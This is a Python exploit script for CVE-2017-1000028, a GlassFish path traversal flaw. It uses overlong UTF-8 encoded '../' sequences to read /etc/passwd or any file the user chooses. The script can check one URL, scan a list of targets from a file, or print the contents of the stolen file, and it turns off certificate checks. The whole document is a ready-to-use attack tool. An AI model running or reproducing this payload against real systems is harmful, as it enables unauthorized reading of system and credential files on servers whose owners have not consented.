from bdb import checkfuncname
import urllib3
import argparse
import sys
import re
import requests

def banner():
    print("CVE-2017-1000028 POC&EXP  BY: NeonNOXXX");
    print("TIPS:The mode -c only can be used in SingleUrl mode.");  



def checkSingle(target):
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    urllib3.disable_warnings()
    try:
        re = requests.get(target + payload,headers = headers,verify = False)
        print('[+]Proving on target : ',target)
        if re.status_code == 200 and 'root' in re.text:
            print(target + ' is vulnerable.')
            #print(re.text)
        else:    
            print(target + ' is not vulnerable.')
    except:
        print('[-]Error.')
        sys.exit(0)
        #re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
        #print(re1.text)

def checkSingleText(target):
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    urllib3.disable_warnings()
    try:
        re = requests.get(target + payload,headers = headers,verify = False)
        print('[+]Proving on target : ',target)
        if re.status_code == 200 and 'root' in re.text:
            print('[+]' + target + ' is vulnerable.')
            print(re.text)
        else:    
            print('[+]' + target + ' is not vulnerable.')
    except:
        print('[-]Error.')
        sys.exit(0)
        #re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
        #print(re1.text)

def checkBunch(file):
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
    print('[+]Proving...')
    urllib3.disable_warnings()
    with open(file,'r') as f:
            target = f.readlines()
            for t in target:
                t = t.strip('\n')
                try:
                    re = requests.get(t + payload,headers = headers,verify = False)
                    if re.status_code == 200 and 'root' in re.text:
                        print('[+]' + t + ' is vulnerable.')
                    else:
                        print('[+]' + t + ' is not vulnerable.')
                
                except:
                    print('[-]Error.') 
                    sys.exit(0)         


def checkCustom(target,custom):
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
    }
    payload = target + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae' + custom
    #print(payload)
    urllib3.disable_warnings()
    try:
        re = requests.get(payload,headers = headers,verify = False)
        if re.status_code == 200:
            print(re.text)
        else:
            print('Cannot read this file.')
    except:
        print('[-]Error.')
        sys.exit(0)


if __name__ == "__main__":
    banner();

    parser = argparse.ArgumentParser(description = 'GlassFish Arbitary File Reading(CVE-2017-100028)')
    parser.add_argument('-u',action = "store",dest = "url",help = "Single Target URL")  #action="store"：仅保留参数
    parser.add_argument('-ut',action = "store",dest = "url_text",help = "Output the passwd file of this Single Target URL")  #action="store"：仅保留参数
    parser.add_argument('-f',action = "store",dest = "file",help = "Read ftom url.txt")    #"Required:True"：参数必需 
    parser.add_argument('-c',action = "store",dest = "custom",help = "Read the Custom File.")    #"Required:True"：参数必需
    args_opt, _ = parser.parse_known_args()
    args = parser.parse_args()
    urllib3.disable_warnings()  

    
    

    if not args.url and not args.file and not args.url_text and not args.custom:
        print("Please spectified one option(-h / -u URL / -uc url customfilepath / -f url.txt / -c The file you want to read.).")
        sys.exit(1)
    
    if args.url:
        checkSingle(args.url)
    
    if args.file:
        checkBunch(args.file)
    
    if args.url_text:
        checkSingleText(args.url_text);

    if args.url and args.custom:
        checkCustom(args.url,args.custom)
            
            
            
 




#payload:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
###